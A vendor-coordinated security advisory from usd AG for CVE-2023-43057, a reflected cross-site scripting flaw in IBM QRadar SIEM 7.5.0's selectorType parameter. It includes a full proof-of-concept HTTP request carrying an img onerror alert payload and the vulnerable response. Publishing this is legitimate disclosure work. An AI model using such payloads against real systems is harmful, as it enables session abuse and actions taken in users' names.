usd-2023-0032 | Reflected XSS in IBM QRadar SIEM 7.5.0 UpdatePackage 5

Advisory ID: usd-2023-0032
Product: IBM QRadar SIEM
Affected Version: IBM QRadar SIEM 7.5.0 UpdatePackage 5 (Build 20230301133107)
Vulnerability Type: CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Security Risk: Medium
Vendor URL: https://www.usd.de/
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE number: CVE-2023-43057
CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2023-43057

Desciption

IBM QRadar SIEM is a security information and event management platform developed by IBM that provides advanced threat detection for its users.

The web interface of the platform is vulnerable to a reflected cross-site scripting attack.
The GET parameter selectorType is not properly encoded by the application, allowing attackers to inject arbitrary JavaScript code into the resulting web page.

Attackers could generate links containing malicious JavaScript code and send them to users who are authenticated to the application.
When the link is opened, the malicious JavaScript code is executed in the user's browser.
This vulnerability could be exploited by attackers in a number of ways. For example, they could perform arbitrary actions within the application in the user's name, or redirect the user to other locations.

Proof of Concept

In the following, the HTML tag ">&ltimg onerror="alert(1)" src="a"/> has been inserted into the HTTP GET selectorType parameter and sent to the application.

GET /console/do/qradar/arielProperties?id=&hasLinkedExpression=false&database=events&submitTestPayload=&destPayload=&sourcePayload=&selectorType=regex%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3e&dispatch=save&prevAction=&newProperty=true&newPropertyName=&__checkbox_forceparse=true&propertyDescription=&enabled=true&__checkbox_enabled=true&deviceTypeId=4009&deviceid=-1&parsedOn=false&qid=1004000002&expressionTypeValue=REGEX&regex=SAP&captureGroup=1&delimiter=&delimiterPair=&aqlExpression=&property1=&property1UD=&operator=%2B&property2=&property2UD=&languagetag=en-US&dateTimePattern=&patternSelect=M&languagetag=en-US HTTP/1.1
Host: [...]
Cookie: JSESSIONID=[...]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Connection: close

The application will then return the following response:

HTTP/1.1 200
Server: QRadar
[...]

<?xml version="1.0" encoding="UTF-8">
[...]
        </div>
        <input type="hidden" name="id" value="" id="qradar_arielProperties_id"/>
        <input type="hidden" name="hasLinkedExpression" value="false" id="qradar_arielProperties_hasLinkedExpression"/>
        <input type="hidden" name="database" value="events" id="qradar_arielProperties_database"/>
        <input type="hidden" name="submitTestPayload" value="" id="testPayload"/>
        <input type="hidden" name="destPayload" value="" id="destPayload"/>
        <input type="hidden" name="sourcePayload" value="" id="sourcePayload"/>
        <input type="hidden" name="selectorType" id="calculated" value="regex\"><img src=a onerror=alert(1)>"/>
        <input type="hidden" name="dispatch" value="save" />
        <input type="hidden" name="prevAction" value="" />
[...]

Line 15 of the response shows that the HTML tag is inserted into the web page and the JavaScript alert(1) is executed.

Fix

It is recommended that any user input that is output back into a web page be coded according to the output context.

References

https://owasp.org/www-community/attacks/xss/
https://nvd.nist.gov/vuln/detail/CVE-2023-43057
https://www.ibm.com/support/pages/node/7070736

Timeline

  • 2023-09-28: First contact request via hackerone.com.
  • 2023-11-16: IBM notifies us of a fix for the reported vulnerability, now referred to as CVE-2023-43057.
  • 2023-11-20: Security Advisory published by usd AG.

Credits

This security vulnerability was identified by Gerbert Roitburd and Dominik Baucke of usd AG.